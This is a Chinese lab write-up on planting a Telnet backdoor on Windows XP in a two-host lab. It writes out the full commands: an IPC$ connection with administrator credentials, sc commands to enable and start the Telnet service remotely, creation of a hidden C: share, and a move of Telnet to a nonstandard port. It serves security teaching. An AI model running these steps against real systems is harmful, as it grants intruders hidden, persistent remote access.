系統後門種植實驗-TELNET

一.預備知識

後門是攻擊者在入侵了計算機以後為了以後能方便的進入該計算機而進行的系統設定或安裝的一類軟體，一般是指那些繞過安全性控制而獲取對程式或系統訪問權的程式或方法，要求有很強的隱蔽性。其用途在於潛伏在電腦中，從事蒐集資訊或便於黑客進入的動作，它是一種登入系統的方法，不僅繞過系統已有的安全設定，而且還能挫敗系統上各種增強的安全設定。簡單的後門可能只是建立一個新的賬號，或者接管一個很少使用的賬號；複雜的後門利用系統服務或其他工具，可能會繞過系統的安全認證而對系統有安全存取權。

該實驗主要針對如何開啟Telnet服務。

Telnet協議是Internet遠端登入服務的標準協議和主要方式。它為使用者提供了在本地計算機上完成遠端主機工作的能力。在終端使用者的電腦上使用Telnet程式，用它連線到伺服器。終端使用者可以在Telnet程式中輸入命令，這些命令會在伺服器上執行，就像直接在伺服器的控制檯上輸入一樣。可以在本地就能控制伺服器。要開始一個Telnet會話，必須輸入使用者名稱和密碼來登入伺服器。Telnet是常用的遠端控制Web伺服器的方法。

二.實驗環境

網路拓撲見下圖：

主機A：winxp IP地址：10.1.1.51

主機B：winxp IP地址：10.1.1.119

三.實驗過程

本地開啟Telnet服務

進入主機A，右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，如圖所示：

雙擊，將啟動型別改為“手動”

實驗截圖：

遠端開啟Telnet服務

（1）首先用流光嗅探等工具探得到對方密碼，主要是弱口令（此步可跳過，用已知的實驗機使用者名稱密碼進行試驗）。

（2）在主機B的“控制面板-工具-資料夾選項-檢視-簡單的檔案共享”去掉選取。

實驗截圖：

（3）右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，關閉之：

（4）回到主機A用net use命令建立ipc$連線（主機使用者名稱密碼可在實驗環境右側“切換”滑鼠懸浮時看到）

命令：net use \\10.1.1.119\ipc$ "主機B的密碼" /user:administrator

實驗截圖：

（5）用sc命令把禁用的telnet服務變成自動

命令：sc \\10.1.1.119 config tlntsvr start= auto

（6）在主機B上可以檢視telnet的啟動型別已經變為自動：

（7）用sc命令將telnet啟動

命令：sc \\10.1.1.119 start tlntsvr

在主機B上可以檢視telnet服務已經啟動：

（8）新建一個cmd環境進行telnet登入：telnet 10.1.1.119

telnet連線建立之後，可輸入使用者名稱密碼等相關資訊進行登入，telnet服務登入到遠端主機：

實驗截圖：

（9）登入後便可進行共享等相關操作，net share建立c$共享

命令：net share abc$=c:

檢視共享目錄：net share

實驗截圖：

（10）遠端更改telnet埠

輸入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主機B的密碼

再次進行telnet連線，則使用埠1000。

實驗截圖：